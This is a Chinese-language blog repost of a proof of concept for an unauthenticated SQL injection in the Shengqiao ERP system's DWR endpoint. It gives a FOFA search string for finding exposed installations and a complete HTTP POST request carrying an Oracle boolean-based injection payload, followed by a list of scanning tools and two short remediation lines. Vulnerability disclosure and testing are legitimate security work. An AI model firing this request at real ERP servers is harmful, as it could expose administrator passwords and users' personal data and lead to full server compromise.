圣乔ERP系统 ResultSetConvertor SQL注入漏洞 POC

2025年1月6日09:32:57评论6 views字数 1307阅读4分21秒阅读模式

产品简介

圣乔ERP系统是杭州圣乔科技有限公司开发的一款企业级管理软件，旨在为企业提供一套全面、集成化的管理解决方案，帮助企业实现资源的优化配置和高效利用。该系统集成了财务、人力资源、生产、销售、供应链等多个业务模块，实现了企业内外部信息的无缝连接和实时共享。适用于各种规模的企业，特别是需要实现资源优化配置、提高运营效率和管理水平的企业。它可以帮助企业解决传统管理方式中存在的信息孤岛、数据重复输入、信息传递滞后等问题，提高企业的整体竞争力。

漏洞概述

圣乔ERP系统

ResultSetConvertor.queryForMapWithDefaultValues.dwr 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。

搜索引擎

FOFA:

title="圣乔ERP系统"

漏洞复现

POST /erp/dwr/call/plaincall/ResultSetConvertor.queryForMapWithDefaultValues.dwr HTTP/1.1Host: Content-Type: text/plainPriority: u=0Accept-Encoding: gzip, deflateAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2callCount=1page=/erp/dwr/test/ResultSetConvertorhttpSessionId=scriptSessionId=B4C02555EA992FF3A73F3CCA60389809871c0-scriptName=ResultSetConvertorc0-methodName=queryForMapWithDefaultValuesc0-id=0c0-param0=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(122)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (99=99) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(122)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)c0-param1=Array:[]batchId=4

sqlmap验证

检测工具

nuclei

afrog

xray

修复建议

1、关闭互联网暴露面或接口设置访问权限

2、对用户传入的参数进行限制

原文始发于微信公众号（nday POC）：圣乔ERP系统 ResultSetConvertor SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

圣乔ERP系统 ResultSetConvertor SQL注入漏洞 POC

Kerio Control CRLF注入漏洞

【已复现】Next.js 中间件鉴权绕过漏洞（CVE-2025-29927）

【支持排查与检测】Vite任意文件读取漏洞(CVE-2025-30208)

Vite 任意文件读取漏洞（CVE-2025-30208）

IngressNightmare：Ingress NGINX 中存在 9.8 严重未经身份验证的远程代码执行漏洞

Vite存在任意文件读取漏洞CVE-2025-30208 附POC

CVE-2025-24813：Apache Tomcat远程代码执行漏洞

CVE-2025-30208 任意文件读取漏洞快速验证

ingress-nginx-controller-admission未授权访问漏洞

用友NC反序列化漏洞

发表评论

在线咨询

微信